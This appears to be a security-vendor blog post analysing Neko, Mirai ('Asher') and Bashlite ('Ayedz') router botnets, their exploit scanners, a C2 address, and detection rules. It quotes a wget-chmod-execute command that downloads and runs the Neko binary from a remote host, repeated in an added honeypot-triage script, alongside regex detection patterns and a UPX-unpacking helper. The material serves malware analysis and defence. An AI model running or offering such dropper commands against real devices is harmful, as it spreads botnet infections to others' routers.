By Augusto Remillano II and Jakub Urbanec
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:
“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”
Our research indicates that this botnet has versions for various processor architectures.
Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can run shell commands and launch user datagram protocol (UDP) and UDP-HEX flood attacks, overwhelming a router so that it can no longer properly process and respond to traffic.
It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.
Further examination of the Neko botnet code shows that it comes with scanners that use multiple exploits to propagate the malware to other vulnerable devices:
Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specific exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.
Figure 1. Neko botnet code showing how it scans for Africo devices
On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time the file is UPX-packed, with its magic number (UPX!) tampered with in an attempt to prevent the botnet from being unpacked.
Figure 2. UPX-packed Neko botnet code with an altered magic number
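Tampering with the magic bytes is enough to make a stock unpacker refuse the file, and restoring them is usually the first step in analysing such a sample. The Python below is an added example, not code from the original post: it locates the two positions where a UPX-packed ELF normally carries UPX!, reports what is actually there, and writes the magic back. The l_info and PackHeader positions are assumed from UPX's ELF layout, the routine assumes only the magic bytes were altered, and the ELF it checks is constructed here rather than a real sample.

```python
import struct

UPX_MAGIC = b"UPX!"

def upx_magic_offsets(data: bytes) -> list:
    """Offsets at which a UPX-packed ELF is expected to carry 'UPX!'.
    Assumed from UPX's ELF layout: the 12-byte l_info header follows the
    program headers with its magic at +4, and the 32-byte PackHeader
    (magic first) sits just before the 4-byte overlay offset ending the file."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    endian = "<" if data[5] == 1 else ">"
    if data[4] == 2:  # ELFCLASS64
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x36)
    else:             # ELFCLASS32
        (e_phoff,) = struct.unpack_from(endian + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x2A)
    l_info = e_phoff + e_phentsize * e_phnum
    return [l_info + 4, len(data) - 36]

def check_upx_magic(data: bytes) -> dict:
    """Map each expected magic offset to the four bytes actually present."""
    return {off: data[off:off + 4] for off in upx_magic_offsets(data)}

def restore_upx_magic(data: bytes) -> bytes:
    """Copy of the file with 'UPX!' rewritten at the expected offsets, so a
    stock 'upx -d' recognises it again (assumes only the magic was altered)."""
    buf = bytearray(data)
    for off in upx_magic_offsets(data):
        buf[off:off + 4] = UPX_MAGIC
    return bytes(buf)

def build_sample(magic: bytes) -> bytes:
    """Constructed stand-in for a packed 32-bit LE ELF (not a real sample):
    valid header fields, two zeroed program headers, l_info, filler, trailer."""
    ehdr = bytearray(52)
    ehdr[:7] = b"\x7fELF\x01\x01\x01"
    struct.pack_into("<I", ehdr, 0x1C, 52)      # e_phoff: right after ehdr
    struct.pack_into("<HH", ehdr, 0x2A, 32, 2)  # e_phentsize, e_phnum
    l_info = b"\x00" * 4 + magic + b"\x00" * 4
    trailer = magic + b"\x00" * 28 + b"\x00" * 4
    return bytes(ehdr) + b"\x00" * 64 + l_info + b"\x00" * 64 + trailer
```

Running check_upx_magic on a real sample whose reported bytes differ at both offsets, but whose file otherwise has the UPX structure, is a quick confirmation that the packer header was hand-edited rather than that the file is not UPX at all.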
We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure with the Africo scan.
Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200
The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (CVE-2016-6277).
Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV-DVR exploits and Netgear R7000 and R6400 routers
This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.
Figure 6. Neko botnet code showing how it scans for “awsec”
In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”. However, based on our analysis, neither payload successfully exploits any vulnerability. “Cisco” appears to attempt CVE-2018-15379, in which the HTTP web server of Cisco Prime Infrastructure has unrestricted directory permissions that allow RCE; however, the payload does not use the correct URI path, so the vulnerability is not exploited.
Figure 7. Neko botnet code showing how it scans for “cisco”
Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.
Figure 8. Neko botnet code showing how it scans for “wap54g”
On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant targets devices running BusyBox, a software suite of Unix utilities for devices with limited resources. It first checks for the presence of BusyBox by executing the command “/bin/busybox {any string}”. If the device responds with “{any string}: applet not found,” the bot proceeds with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”
Figure 9. Screenshot showing the command that checks for the presence of a BusyBox
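Two of the behaviours described above lend themselves to honeypot log triage: Neko's download-chmod-execute command chain and Asher's BusyBox applet probe. The Python below is an added example, not code from the original post; it runs over a constructed telnet transcript that reuses the command line and the “Asher” token quoted in the write-up, and the regular expressions are this example's own.

```python
import re
from typing import Dict, List

# Mirai-style BusyBox probe "/bin/busybox TOKEN" and the reply the bot waits
# for, "TOKEN: applet not found". TOKEN doubles as the variant's chosen name.
BUSYBOX_PROBE = re.compile(r"/bin/busybox\s+([A-Za-z0-9_]{2,16})$")
APPLET_REPLY = re.compile(r"^([A-Za-z0-9_]{2,16}): applet not found$")

# Neko-style dropper chain: change to a writable directory, fetch a binary,
# mark it executable, run it. Only the shape is matched, not a fixed host.
DROPPER_CHAIN = re.compile(
    r"cd\s+(?P<dir>\S+);\s*"
    r"(?:wget|curl)\s+(?P<url>\S+);\s*"
    r"chmod\s+[0-7]{3,4}\s+(?P<file>\S+);\s*"
    r"\./(?P=file)\b"
)

def triage_session(lines: List[str]) -> Dict[str, list]:
    """Summarise one honeypot telnet transcript: which BusyBox 'name' tokens
    appeared, and which download-chmod-execute chains were issued."""
    tokens, droppers = set(), []
    for raw in lines:
        line = raw.strip()
        m = BUSYBOX_PROBE.search(line) or APPLET_REPLY.match(line)
        if m:
            tokens.add(m.group(1))
        for d in DROPPER_CHAIN.finditer(line):
            droppers.append({"dir": d["dir"], "url": d["url"], "file": d["file"]})
    return {"busybox_tokens": sorted(tokens), "droppers": droppers}

# Constructed transcript (not a real capture); the probe token and the dropper
# command line are the ones quoted in the write-up.
SAMPLE_SESSION = [
    "enable",
    "system",
    "shell",
    "sh",
    "/bin/busybox ASHER",
    "ASHER: applet not found",
    "cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko",
]

if __name__ == "__main__":
    print(triage_session(SAMPLE_SESSION))
```

The token list is a cheap way to cluster sessions by Mirai fork, since each fork tends to hard-code its own string, while the dropper URLs feed straight into blocklists and sample collection.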
The “Asher” variant can infiltrate routers by brute-forcing its way in using the following telnet login credentials:
We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:
Figure 10. The exploits Asher botnet scans for
Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability
Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361
Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562
On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time a Bashlite variant that, based on its file name, seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4). Upon execution, Ayedz sends the following information about the infected device back to the host IP address 167[.]71[.]7[.]231 via port 46216:
Figure 14. The commands used by Bashlite variant Ayedz to send information back to its host
Analysis of this Ayedz sample revealed that it is capable of running several backdoor commands for launching DDoS attacks. We also observed that Ayedz features several attack/flood options as well as other commands to its operators, such as:
Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats like Mirai, Neko, and Bashlite:
Trend Micro Smart Home Network protects customers from the aforementioned exploits through these rules:
Rule ID | Rule
1133255 | WEB Remote Command Execution in XML -1
1059669 | WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID-37690)
1134287 | WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)
1134610 | WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
1134611 | WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
1134891 | WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
1134892 | WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)
1058632 | EXPLOIT Linksys E-series Unauthenticated Remote Code Execution Exploit (EDB-31683)
1054456 | WEB Linksys Unauthenticated Remote Code Execution -1 (OSVDB-103321)
1054457 | WEB Linksys Unauthenticated Remote Code Execution -2 (OSVDB-103321)
1133498 | WEB Remote Command Execution via Shell Script -1.u
1135215 | WEB ThinkPHP Remote Code Execution
1134286 | WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)

1133498 | WEB Remote Command Execution via Shell Script -1.u
1134286 | WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
1134610 | WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
1134611 | WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
1134891 | WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
1134892 | WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)
Trend Micro
Neko
Payload | Rule
Netgear | Official Rule 2547: NETGEAR DGN1000/DGN2200 Remote Code Execution – HTTP (Request)
NetgearR7064 | Official Rule 4103: Daemon DD-WRT Unauthenticated RCE Exploit – HTTP (Request)
Crossweb | Beta Rule 3268: CCTV-DVR Remote Code Execution – HTTP (Request); Official Rule 2485: CCTV-DVR Remote Code Execution – HTTP (Request)
Cisco | Official Rule 2452: Wget Commandline Injection; Beta Rule 3269: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request); Official Rule 4168: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request)
Awsec/Vacron | Official Rule 2543: VACRON Remote Code Execution Exploit – HTTP (Request)
WAP54G | Beta Rule 3270: Linksys Remote Debug Root Shell – HTTP (Request); Official Rule 4169: Linksys Remote Debug Root Shell – HTTP (Request)

Asher
Payload | Rule
REALTEK | Rule 2575: Command Injection via UPnP SOAP Interface – HTTP (Request)
JAWS | Rule 2544: JAWS Remote Code Execution Exploit – HTTP (Request); Rule 2639: CVE-2018-10562 – GPON Remote Code Execution – HTTP (Request)

Ayedz
Payload | Rule
Linux | Beta Rule 3272: BASHLITE – TCP (Request); Official Rule 4180: BASHLITE – TCP (Request)
The indicators of compromise (IoCs) are listed in an appendix.
This post, “Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices,” appeared first on Trend Micro.